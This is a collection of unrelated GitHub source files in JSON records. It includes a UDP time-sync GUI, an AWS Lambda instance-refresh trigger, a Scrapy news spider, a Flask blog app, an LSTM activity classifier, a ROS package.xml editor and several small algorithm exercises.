+{"seq_id":"31990054756","text":"import socket\r\nfrom datetime import datetime\r\nimport tkinter as tk\r\n\r\nUDP_PORT = 10006\r\nMESSAGE = \"CTCTime:F:2019.04.30-23:27:00.00:Manual\"\r\nsock = socket.socket(socket.AF_INET, # Internet\r\n socket.SOCK_DGRAM) # UDP\r\n\r\nclass Application:\r\n def __init__(self):\r\n self.window = tk.Tk()\r\n self.window.title(\"ChronoSync\") \r\n \r\n self.txt_ip = tk.Entry(self.window,\r\n justify = tk.CENTER,\r\n width = 25, font = (\"Oswald\", 15))\r\n\r\n self.txt_ip.insert(tk.END, \"172.20.23.98\")\r\n\r\n button_fileData = tk.Button(self.window, fg=\"red\",\r\n text = 'SYNC',\r\n font = (\"Oswald\", 15),\r\n width=25, height=1,\r\n borderwidth = 3,\r\n command = self.send)\r\n self.txt_ip.grid()\r\n button_fileData.grid()\r\n self.window.mainloop()\r\n\r\n def send(self):\r\n UDP_IP = self.txt_ip.get()\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%Y.%m.%d-%H:%M:%S.%f\")[:-4]\r\n MESSAGE = \"CTCTime:F:{}:Manual\".format(dt_string)\r\n sock.sendto(MESSAGE.encode('utf-8'), (UDP_IP, UDP_PORT))\r\n print(MESSAGE)\r\n print(UDP_IP)\r\n\r\napl = Application()\r\n","repo_name":"j-jakub-jankowski/ChronoSync","sub_path":"ChronoSync.py","file_name":"ChronoSync.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31044640809","text":"import json\nimport datetime\nimport time\nimport os\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\nfrom copy import error\n\nec2_client = boto3.client('ec2')\nautoscaling = boto3.client('autoscaling')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_handler(event, context):\n\n asg_name = event.get('targetASG')\n str_asg = (\" \".join(map(str,asg_name)))\n\n # Trigger Auto Scaling group Instance Refresh\n trigger_auto_scaling_instance_refresh(str_asg)\n return(\"Success\")\n\ndef trigger_auto_scaling_instance_refresh(str_asg, strategy=\"Rolling\",\n min_healthy_percentage=90, instance_warmup=300):\n\n try:\n response = autoscaling.start_instance_refresh(\n AutoScalingGroupName=str_asg,\n Strategy=strategy,\n Preferences={\n 'MinHealthyPercentage': min_healthy_percentage,\n 'InstanceWarmup': instance_warmup\n })\n logging.info(\"Triggered Instance Refresh {} for Auto Scaling \"\n \"group {}\".format(response['InstanceRefreshId'], str_asg))\n \n except ClientError as e:\n logging.error(\"Unable to trigger Instance Refresh for \"\n \"Auto Scaling group {}\".format(str_asg))\n raise e\n","repo_name":"karthik7996/aws-auto-patching","sub_path":"Lambda/instance_refresh.py","file_name":"instance_refresh.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72711954139","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport re\nfrom copy import deepcopy\nfrom urllib.parse import unquote\nimport scrapy\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom news.tool.connet_mysql import seach_sql_all\nfrom news.items import NewsItem\nfrom news.tool.handle import datestamptrans\nfrom news.tool.BloomCheck import BloomCheckFunction\n\n\nclass QqSpider(scrapy.Spider):\n name = 'qq'\n allowed_domains = ['qq.com']\n start_urls = [\n 'http://pacaio.match.qq.com/irs/rcd?cid=52&token=8f6b50e1667f130c10f981309e1d8200&ext=3910,3911,3904,3901,3906,3912,3917,3902&page=0']\n\n def __init__(self):\n self.bof = BloomCheckFunction()\n super(QqSpider, self).__init__()\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n def spider_closed(self, spider):\n print(\"*\"*50)\n print(\"spider closed\")\n self.bof.save_bloom_file()\n\n\n def start_requests(self):\n headers = {\n 'Referer': 'http://new.qq.com/ch2/licai',\n }\n yield scrapy.Request(\n self.start_urls[0],\n headers=headers,\n callback=self.parse\n )\n\n def parse(self, response):\n res = json.loads(response.body.decode())\n revs = res[\"data\"]\n for rev in revs:\n item = NewsItem()\n item[\"update_date\"] = str(datetime.date.today())\n item['title'] = rev['title']\n # item['postive_score'] = handle_tag(item['title'])\n item['postive_score'] = 0\n update_time = rev['update_time']\n if update_time is not None:\n item['update_time'] = update_time\n item['news_time'] = datestamptrans(item['update_time'])\n item['platform'] = rev['source']\n item['href'] = rev['vurl']\n a_re = re.search(r'\\.html', item['href'])\n if a_re:\n item['href'] = rev['vurl']\n else:\n item['href'] = rev['vurl'][0:-2] + \".html\"\n if item['title'] and self.bof.process_item(item[\"title\"]):\n yield scrapy.Request(\n item['href'],\n callback=self.detail_parse,\n meta={\"item\": deepcopy(item)}\n )\n\n def detail_parse(self, response):\n item = deepcopy(response.meta[\"item\"])\n content = response.xpath(\"string(//div[@class='content-article'])\").extract()\n if len(content) > 0:\n item['content'] = ''.join(''.join(content).split())\n yield item\n\n","repo_name":"arjun-go-go/scrapy_bloomfilter_news","sub_path":"news/news/spiders/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"1264675694","text":"# This pdf reader reads Arabic properly but has problems when both RTL and LTR languages exist\n# pypdf==3.4.1\nfrom pypdf import PdfReader\n\nreader = PdfReader(\"/mnt/D/Upwork/Ali-UAE/shared_folder_reader/sample_files/sample-arabic.pdf\")\nfull_text = \"\"\nfor page in reader.pages:\n full_text += page.extract_text() + \"\\n\"\nprint(full_text)\n\nwith open('/mnt/D/Upwork/Ali-UAE/shared_folder_reader/arabicpdfreaderout.txt', 'w+') as f:\n f.writelines(full_text)\n\n","repo_name":"esraa-abdelmaksoud/Miscellaneous","sub_path":"pdf_reader_pypdf.py","file_name":"pdf_reader_pypdf.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36748982179","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom datetime import datetime\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'you-will-never-guess'\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get('DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, 'posts.db')\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\n\nclass BlogPosts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable=False)\n author = db.Column(db.String(20), nullable=False, default='N/A')\n content = db.Column(db.Text, nullable=False)\n date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __repr__(self):\n return 'Blog post ' + str(self.id)\n\n\nclass ContactMe(db.Model):\n # MANUAL TABLE NAME\n __tablename__ = \"ContactMe\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20), nullable=False)\n email = db.Column(db.String(20), nullable=False)\n subject = db.Column(db.String(10), nullable=False)\n message = db.Column(db.Text, nullable=False)\n\n def __init__(self, name, email, subject, message):\n self.name = name\n self.email = email\n self.subject = subject\n self.message = message\n\n def __repr__(self):\n return \"Contacted Me\"\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/posts', methods=[\"GET\", \"POST\"])\ndef posts():\n if request.method == \"POST\":\n post_title = request.form['title']\n post_author = request.form['author']\n post_content = request.form['content']\n new_post = BlogPosts(title=post_title, author=post_author, content=post_content)\n db.session.add(new_post)\n db.session.commit()\n return redirect(\"/posts\")\n else:\n all_posts = BlogPosts.query.all()\n return render_template(\"posts.html\", posts=all_posts)\n\n\n@app.route('/posts/delete/')\ndef delete(id):\n post = BlogPosts.query.get(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(\"/posts\")\n\n\n@app.route('/posts/edit/', methods=[\"GET\", \"POST\"])\ndef edit(id):\n post = BlogPosts.query.get(id)\n\n if request.method == \"POST\":\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template(\"edit.html\", post=post)\n\n\n@app.route('/posts/new', methods=[\"GET\", \"POST\"])\ndef new_posts():\n if request.method == \"POST\":\n post.title = request.form['title']\n post.author = request.form['author']\n post.content = request.form['content']\n new_post = BlogPosts(title=post_title, author=post_author, content=post_content)\n db.session.add(new_post)\n db.session.commit()\n return redirect('/posts')\n else:\n return render_template(\"new_posts.html\")\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n@app.route('/skills')\ndef skills():\n return render_template('skills.html')\n\n\n@app.route('/contact', methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n name = request.form.get('name')\n email = request.form.get('email')\n subject = request.form.get('subject')\n message = request.form.get('message')\n contact_message = ContactMe(name, email, subject, message)\n db.session.add(contact_message)\n db.session.commit()\n return redirect('contact.html')\n\n return render_template('contact.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"hibenca/Health-and-Technology-Website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17880343020","text":"class Character(object):\n def __init__(self, id, name, **details):\n self._id = id\n self._details = details\n self.name = name.strip()\n self.fill(**self._details)\n\n def fill(self, **details):\n self.url = details['resourceURI']\n self.description = details['description']\n self.detail_url = [url for url in details['urls'] if url['type'] == 'detail']\n self.comics = [Comic(comic['name']) for comic in details['comics']['items']]\n self.series = []\n self.stories = []\n self.events = []\n\n\nclass Comic(object):\n def __init__(self, title):\n self.title = title\n","repo_name":"kennethlove/marvelwrapper","sub_path":"marvel/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"35944763634","text":"\"\"\"\n Name: Nnamdi Ajoku\n Language: Python3\n\n Description: Given an array of integers nums containing\n \n n + 1 integers where each integer is in the range [1, n] inclusive.\n\n There is only one repeated number in nums, return this repeated number.\n\n You must solve the problem without modifying the array nums and uses only\n \n constant extra space.\n\n \n\n\"\"\"\ndef findDuplicate(nums):\n track = {}\n \n for i in range(len(nums)):\n if nums[i] not in track:\n track[nums[i]] = nums[i]\n else:\n return nums[i]","repo_name":"ajaycmput/LeetCode_Solved","sub_path":"DuplicateNumber/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8502395133","text":"def solution(a):\n answer = 0\n x, y = ord(a[0])-96, int(a[1])\n\n dx = [-1, 1, -1, 1, -2, 2, -2, 2]\n dy = [-2, -2, 2, 2, -1, -1, 1, 1]\n for i in range(8):\n if x+dx[i] > 0 and x+dx[i] < 9 and y+dy[i] > 0 and y+dy[i] < 9 :\n answer += 1\n return answer\n\nprint(solution(\"a1\")) # 2\nprint(solution(\"h3\")) # 4","repo_name":"skill-trees/Algorithm","sub_path":"13주차/0328/왕실의 나이트_ssuh0o0.py","file_name":"왕실의 나이트_ssuh0o0.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"73189864220","text":"from socket import *\n\nlocalhost = \"127.0.0.1\"\nport = 43210\nobj_socket = socket(AF_INET, SOCK_DGRAM)\nobj_socket.bind((localhost, port))\nprint(\"Server ready...\")\nwhile True:\n data, origin = obj_socket.recvfrom(65535)\n print(\"Origin..........: \", origin)\n print(\"Received data: \", data.decode())\n answer = input(\"Enter the answer: \")\n obj_socket.sendto(answer.encode(), origin)\nobj_socket.close()\n","repo_name":"jonasmzsouza/python-nano-course","sub_path":"12Socket/UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"71417241501","text":"import string\ndef de_punctuation(line):\n for e in string.punctuation:\n if e in line:\n line=line.replace(e,\" \")\n return line\ndef repeating_words(l):\n d={}\n for word in l:\n if word in d:\n d[word]+=1\n else:\n d[word]=1\n return d\n\ndef opening_file(myfile):\n c=0\n l1=[]\n for line in myfile:\n line=line.strip(string.whitespace+string.punctuation)\n line=de_punctuation(line)\n for word in line.split():\n l1.append(word.lower())\n c=c+1\n #print(l1)\n print(c)\n return repeating_words(l1)\n\n\n\nmyfile=open(\"58771-0.txt\")\nt=opening_file(myfile)\nresult=list(t.keys())\nfor i in range(20):\n print(result[i])\n\n","repo_name":"inwk6312winter2019/week4labsubmissions-khyathinalluri","sub_path":"4task3.py","file_name":"4task3.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20430697049","text":"# 进程的创建 create process\n# LINUX 系统在os模块下的fork函数\nfrom multiprocessing import Process\nfrom time import sleep\nimport os\n\n\n# 自定义进程\nclass Myprocess(Process):\n def __init__(self, name):\n super(Myprocess,self).__init__()\n self.name = name\n\n\n# 重写run方法\n def run(self):\n n = 1\n while True:\n sleep(1)\n # print (\"进程名:\",self.name)\n print(\"{}---------》自定义进程{}\".format(n, self.name))\n n += 1\n\n\nif __name__ == '__main__':\n p = Myprocess(name='小明')\n p.start()\n p1 = Myprocess(name='小红')\n p1.start()\n","repo_name":"Howardhuang98/Blog","sub_path":"demos/python_learning/进程与线程2.py","file_name":"进程与线程2.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72108916379","text":"# space = O(1), time = O(n^2)\ndef firstDuplicateValue(array):\n min_inx_of_sec_duplicate = len(array)\n for i in range(len(array)):\n value = array[i]\n for j in range( i+1, len(array)):\n value_to_compare = array[j]\n if value == value_to_compare:\n min_inx_of_sec_duplicate = min(min_inx_of_sec_duplicate,j) # replaced by the closest the number to current if, if the original value is larger, it would not be replaced.\n if min_inx_of_sec_duplicate == len(array):\n return -1\n return array[min_inx_of_sec_duplicate]\n\narray =[2, 1, 5, 2, 3, 3, 4]\nprint(firstDuplicateValue(array))\n\n","repo_name":"jolliebonnie/training_projects","sub_path":"array/first duplicates/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36175727041","text":"import numpy as np\r\nimport pandas as pd\r\nfrom tensorflow import keras\r\nfrom keras.layers import BatchNormalization\r\nimport tensorflow as tf\r\n\r\ndataset = pd.read_csv('Dataset_with_fall.csv')\r\ndataset = dataset.drop(['user','Magnetometer_X','Magnetometer_Y','Magnetometer_Z', 'Gyroscope_X','Gyroscope_Y','Gyroscope_Z'], axis=1)\r\nx = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, -1].values\r\n# print(dataset.head())\r\n\r\ny_training = np.array(y[0:len(y)-21])\r\nx_training = []\r\nfor i in range(len(x)-21):\r\n x_tr = []\r\n for j in range(i,i+21):\r\n for k in range(6):\r\n x_tr.append(x[j][k])\r\n x_training.append(x_tr)\r\n\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nHotEncode = OneHotEncoder()\r\ny = HotEncode.fit_transform(y.reshape(9396,1)).toarray()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.25, random_state = 3)\r\n\r\n# x_train, x_validation, y_train, y_validation = train_test_split(x_train, y_train, test_size = 0.2, random_state = 1)\r\nx_train = tf.expand_dims(x_train, axis=2)\r\n# x_validation = tf.expand_dims(x_validation, axis=2)\r\n# y_train = tf.expand_dims(y_train, axis=2)\r\n# y_validation = tf.expand_dims(y_validation, axis=2)\r\nx_test = tf.expand_dims(x_test, axis=2)\r\n# y_test = tf.expand_dims(y_test, axis=2)\r\n\r\ndef build_model():\r\n model = tf.keras.Sequential()\r\n activation = 'relu'\r\n model.add(keras.layers.LSTM(units=128, input_dim=3, input_shape = (x_train.shape[1:]), activation=activation, return_sequences=True))\r\n model.add(keras.layers.Dropout(0.2))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.LSTM(units=128, activation=activation))\r\n model.add(keras.layers.Dropout(0.2))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.Dense(units=32, activation=activation))\r\n model.add(BatchNormalization())\r\n model.add(keras.layers.Dropout(0.3))\r\n model.add(keras.layers.Dense(units=7, activation='softmax'))\r\n return model\r\n\r\n\r\nclass myCallback(keras.callbacks.Callback):\r\n def on_epoch_end(self, epoch, logs={}):\r\n if logs.get('val_accuracy') >= 0.92 and logs.get('accuracy') >= 0.98:\r\n self.model.stop_training = True\r\n print(\"\\nReached 98% accuracy so cancelling training!\") \r\n\r\n\r\ncallbacks = myCallback()\r\n\r\nmodel = build_model()\r\nmodel.compile(optimizer=tf.optimizers.Adam(decay=1e-5,learning_rate=1e-3), loss='mse', metrics=['accuracy'])\r\nmodel.fit(x_train, y_train, epochs=1200, callbacks=[callbacks],validation_data=(x_test, y_test))\r\nprint(model.summary())\r\nprint(model.evaluate(x_test, y_test))\r\nprint(model.metrics_names)\r\n\r\n# for i in range(0,15):\r\n# print(HotEncode.inverse_transform(model.predict(np.array([x_test[i,:]]))))\r\n\r\n# print(y_test[0:15,:])\r\n\r\n","repo_name":"vishalsingh17-web2/IoT-domain","sub_path":"ML & DL Models/rnn_fall.py","file_name":"rnn_fall.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19376609717","text":"class Solution:\n\n def isPalindrome(self, x: int) -> bool:\n my_int = x\n int_String = str(my_int)\n int_length = len(int_String)\n list = [int(x) for x in str(my_int)]\n i = 0\n p = 0\n q = int_length-1\n while i < int_length:\n if list[p] == list[q]:\n truth_Value = True\n p = p + 1\n q = q - 1\n i = i+1\n elif x == 0:\n truth_Value = True\n else:\n truth_Value = False\n i = i+1\n\n print(truth_Value)\n\n\na = Solution()\na.isPalindrome(0)\n\n\n\n\n","repo_name":"lcswnn/CS331_Python_Assignment_1","sub_path":"Palindrome Number.py","file_name":"Palindrome Number.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4381672846","text":"import collections\nimport operator\nimport re\nfrom xml.dom.minidom import parse\n\nDEPEND_ORDERING = ['buildtool_depend', 'depend', 'build_depend', 'build_export_depend',\n 'run_depend', 'exec_depend', 'test_depend', 'doc_depend']\n\nORDERING = ['name', 'version', 'description',\n ['maintainer', 'license', 'author', 'url']] + DEPEND_ORDERING + ['export']\n\nINDENT_PATTERN = re.compile('\\n *')\n\nPEOPLE_TAGS = ['maintainer', 'author']\n\nBUILD_TYPES = {'catkin', 'cmake'}\n\nFORMAT_3_HEADER = \"\"\"\n\n\"\"\"\n\n\ndef get_ordering_index(name, whiny=True):\n for i, o in enumerate(ORDERING):\n if type(o) == list:\n if name in o:\n return i\n elif name == o:\n return i\n if name and whiny:\n print('\\tUnsure of ordering for ' + name)\n return len(ORDERING)\n\n\ndef get_package_tag_index(s, key='= 2 and mode != 'test':\n keys.append('depend')\n if mode == 'run':\n keys.append('exec_depend')\n if mode == 'test':\n keys.append('test_depend')\n pkgs = []\n for key in keys:\n pkgs += self.get_packages_by_tag(key)\n return set(pkgs)\n\n def get_tab_element(self, tabs=1):\n return self.tree.createTextNode('\\n' + ' ' * (self.std_tab * tabs))\n\n def get_child_indexes(self):\n \"\"\"Return a dictionary based on which children span which indexes.\n\n The keys are the types of nodes in the xml (build_depend, maintainer, etc).\n The values are arrays marking the range of elements in the xml root that match that tag.\n\n For example, tags[build_depend] = [(5, 9), (11, 50)] means that elements [5, 9) and [11, 50) are\n either build_depend elements (or the strings between them)\n \"\"\"\n tags = collections.defaultdict(list)\n i = 0\n current = None\n current_start = 0\n current_last = 0\n while i < len(self.root.childNodes):\n child = self.root.childNodes[i]\n if child.nodeType == child.TEXT_NODE:\n i += 1\n continue\n\n name = child.nodeName\n if name != current:\n if current:\n tags[current].append((current_start, current_last))\n current_start = i\n current = name\n current_last = i\n i += 1\n if current:\n tags[current].append((current_start, current_last))\n return dict(tags)\n\n def get_insertion_index(self, tag, tag_value=None):\n \"\"\"Return the index where to insert a new element with the given tag type.\n\n If there are already elements of that type, then either insert after the last matching element,\n or if the list is alphabetized, insert it in the correct place alphabetically using the tag_value.\n Otherwise, look at the existing elements, and find ones that are supposed to come the closest\n before the given tag, and insert after them. If none found, add at the end.\n \"\"\"\n indexes = self.get_child_indexes()\n # If there are elements of this type already\n if tag in indexes:\n if len(indexes[tag]) == 1 and tag in DEPEND_ORDERING:\n start, end = indexes[tag][0]\n tag_values = []\n my_index = start\n for i in range(start, end + 1):\n child = self.root.childNodes[i]\n if child.nodeType == child.TEXT_NODE:\n continue\n value = child.firstChild.data\n tag_values.append(value)\n if tag_value >= value:\n my_index = i\n\n # If already sorted, and first_value is defined (meaning there are existing tags)\n if tag_values and sorted(tag_values) == tag_values:\n # If it should go before the current first tag, we XXX\n if tag_value <= tag_values[0]:\n return my_index - 1\n\n # If it should go before some existing tag\n if tag_value <= tag_values[-1]:\n return my_index\n\n # If all else fails, we insert the tag after the last matching tag\n return indexes[tag][-1][1] # last match, end index\n\n # If no elements match this type, then find the right place to insert\n else:\n max_index = get_ordering_index(tag, whiny=False)\n best_tag = None\n best_index = None\n for tag in indexes:\n ni = get_ordering_index(tag, whiny=False)\n if ni >= max_index:\n # This tag should appear after our tag\n continue\n\n if best_tag is None or ni > best_index or indexes[tag][-1] > indexes[best_tag][-1]:\n best_tag = tag\n best_index = ni\n\n if best_tag is None:\n return len(self.root.childNodes)\n else:\n return indexes[best_tag][-1][1]\n\n def insert_new_tag(self, tag):\n if tag.tagName in DEPEND_ORDERING:\n value = tag.firstChild.data\n else:\n value = None\n\n index = self.get_insertion_index(tag.tagName, value)\n before = self.root.childNodes[:index + 1]\n after = self.root.childNodes[index + 1:]\n\n new_tab_element = self.get_tab_element()\n\n # if the tag immediately before where we're going to insert is a text node,\n # then insert the new element and then the tab\n if before and before[-1].nodeType == before[-1].TEXT_NODE:\n new_bits = [tag, new_tab_element]\n else:\n # Otherwise (i.e. most cases) insert the tab then the element\n new_bits = [new_tab_element, tag]\n\n self.root.childNodes = before + new_bits + after\n self.changed = True\n\n def insert_new_tags(self, tags):\n for tag in tags:\n self.insert_new_tag(tag)\n\n def insert_new_tag_inside_another(self, parent, tag, depth=2):\n all_elements = []\n all_elements.append(self.get_tab_element(depth))\n all_elements.append(tag)\n\n if len(parent.childNodes) == 0:\n parent.childNodes = all_elements + [self.get_tab_element()]\n else:\n parent.childNodes = parent.childNodes[:-1] + all_elements + parent.childNodes[-1:]\n self.changed = True\n\n def insert_new_packages(self, tag, values):\n for pkg in sorted(values):\n print('\\tInserting %s: %s' % (tag, pkg))\n node = self.tree.createElement(tag)\n node.appendChild(self.tree.createTextNode(pkg))\n self.insert_new_tag(node)\n\n def add_packages(self, build_depends, run_depends, test_depends=None, prefer_depend_tag=True):\n if self.format == 1:\n run_depends.update(build_depends)\n existing_build = self.get_packages('build')\n existing_run = self.get_packages('run')\n build_depends = build_depends - existing_build\n run_depends = run_depends - existing_run\n if self.format == 1:\n self.insert_new_packages('build_depend', build_depends)\n self.insert_new_packages('run_depend', run_depends)\n elif prefer_depend_tag:\n depend_tags = build_depends.union(run_depends)\n\n # Remove tags that overlap with new depends\n self.remove_dependencies('build_depend', existing_build.intersection(depend_tags))\n self.remove_dependencies('exec_depend', existing_run.intersection(depend_tags))\n\n # Insert depends\n self.insert_new_packages('depend', depend_tags)\n else:\n both = build_depends.intersection(run_depends)\n self.insert_new_packages('depend', both)\n self.insert_new_packages('build_depend', build_depends - both)\n self.insert_new_packages('exec_depend', build_depends - both - existing_run)\n self.insert_new_packages('exec_depend', run_depends - both)\n\n if test_depends is not None and len(test_depends) > 0:\n existing_test = self.get_packages('test')\n test_depends = set(test_depends) - existing_build - build_depends - existing_test\n self.insert_new_packages('test_depend', test_depends)\n\n def remove_element(self, element):\n \"\"\"Remove the given element AND the text element before it if it is just an indentation.\"\"\"\n parent = element.parentNode\n index = parent.childNodes.index(element)\n if index > 0:\n previous = parent.childNodes[index - 1]\n if previous.nodeType == previous.TEXT_NODE and INDENT_PATTERN.match(previous.nodeValue):\n parent.removeChild(previous)\n parent.removeChild(element)\n self.changed = True\n\n def remove_dependencies(self, name, pkgs, quiet=False):\n for el in self.root.getElementsByTagName(name):\n pkg = el.childNodes[0].nodeValue\n if pkg in pkgs:\n if not quiet:\n print('\\tRemoving %s %s' % (name, pkg))\n self.remove_element(el)\n\n def get_elements_by_tags(self, tags):\n elements = []\n for tag in tags:\n elements += self.root.getElementsByTagName(tag)\n return elements\n\n def get_people(self):\n people = []\n for el in self.get_elements_by_tags(PEOPLE_TAGS):\n name = el.childNodes[0].nodeValue\n email = el.getAttribute('email')\n people.append((name, email))\n return people\n\n def update_people(self, target_name, target_email=None, search_name=None, search_email=None):\n for el in self.get_elements_by_tags(PEOPLE_TAGS):\n name = el.childNodes[0].nodeValue\n email = el.getAttribute('email') if el.hasAttribute('email') else ''\n if (search_name is None or name == search_name) and (search_email is None or email == search_email):\n el.childNodes[0].nodeValue = target_name\n if target_email:\n el.setAttribute('email', target_email)\n print('\\tReplacing %s %s/%s with %s/%s' % (el.nodeName, name, email, target_name, target_email))\n self.changed = True\n\n def get_license_element(self):\n els = self.root.getElementsByTagName('license')\n if len(els) == 0:\n return None\n return els[0]\n\n def get_license(self):\n el = self.get_license_element()\n return el.childNodes[0].nodeValue\n\n def set_license(self, license_str):\n el = self.get_license_element()\n if license != el.childNodes[0].nodeValue:\n el.childNodes[0].nodeValue = license_str\n self.changed = True\n\n def is_metapackage(self):\n for node in self.root.getElementsByTagName('export'):\n for child in node.childNodes:\n if child.nodeType == child.ELEMENT_NODE:\n if child.nodeName == 'metapackage':\n return True\n return False\n\n def get_plugin_xmls(self):\n \"\"\"Return a mapping from the package name to a list of the relative path(s) for the plugin xml(s).\"\"\"\n xmls = collections.defaultdict(list)\n export = self.root.getElementsByTagName('export')\n if len(export) == 0:\n return xmls\n for ex in export:\n for n in ex.childNodes:\n if n.nodeType == self.root.ELEMENT_NODE:\n plugin = n.getAttribute('plugin').replace('${prefix}/', '')\n xmls[n.nodeName].append(plugin)\n return xmls\n\n def get_export_tag(self):\n \"\"\"Get the export tag. Create it if it doesn't exist.\"\"\"\n export_tags = self.root.getElementsByTagName('export')\n if len(export_tags) == 0:\n export_tag = self.tree.createElement('export')\n self.insert_new_tag(export_tag)\n return export_tag\n else:\n return export_tags[0]\n\n def add_plugin_export(self, pkg_name, xml_path):\n \"\"\"Add the plugin configuration if not found. Add export tag as needed. Return the surrounding export tag.\"\"\"\n ex_tag = self.get_export_tag()\n\n attr = '${prefix}/' + xml_path\n for tag in ex_tag.childNodes:\n if tag.nodeName != pkg_name:\n continue\n plugin = tag.attributes.get('plugin')\n if plugin and plugin.value == attr:\n return\n\n pe = self.tree.createElement(pkg_name)\n pe.setAttribute('plugin', attr)\n self.insert_new_tag_inside_another(ex_tag, pe)\n return ex_tag\n\n def upgrade(self, new_format=2, quiet=True):\n if self.format == new_format:\n if not quiet:\n print('%s already in format %d!' % (self.name, self.format))\n return\n\n if new_format not in [2, 3]:\n raise RuntimeError('Unknown PackageXML version: ' + repr(new_format))\n\n if self.format == 1:\n if not quiet:\n print('Converting {} from version {} to 2'.format(self.name, self.format))\n self._format = 2\n self.root.setAttribute('format', '2')\n replace_package_set(self, ['build_depend', 'run_depend'], 'depend')\n replace_package_set(self, ['run_depend'], 'exec_depend')\n\n if new_format == 3:\n if not quiet:\n print('Converting {} from version {} to 3'.format(self.name, self.format))\n self._format = 3\n self.root.setAttribute('format', '3')\n self.header = FORMAT_3_HEADER\n\n self.changed = True\n\n def write(self, new_fn=None):\n if new_fn is None:\n new_fn = self.fn\n\n if new_fn == self.fn and not self.changed:\n return\n\n s = self.tree.toxml(self.tree.encoding)\n index = get_package_tag_index(s)\n s = self.header + s[index:] + '\\n'\n\n with open(new_fn, 'wb') as f:\n f.write(s.encode('UTF-8'))\n","repo_name":"DLu/roscompile","sub_path":"ros_introspection/src/ros_introspection/package_xml.py","file_name":"package_xml.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"69"}
+{"seq_id":"33370713394","text":"def distributeCandies(self, candies, num_people):\n \"\"\"\n :type candies: int\n :type num_people: int\n :rtype: List[int]\n \"\"\"\n res = [0] * num_people\n give = 1\n i = 0\n\n while candies > 0:\n if give <= candies:\n res[i] += give\n else:\n give = candies\n res[i] += candies\n candies -= give\n give += 1\n i += 1\n i = i % num_people\n return res","repo_name":"CoderQingli/MyLeetCode","sub_path":"1103. Distribute Candies to People.py","file_name":"1103. Distribute Candies to People.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
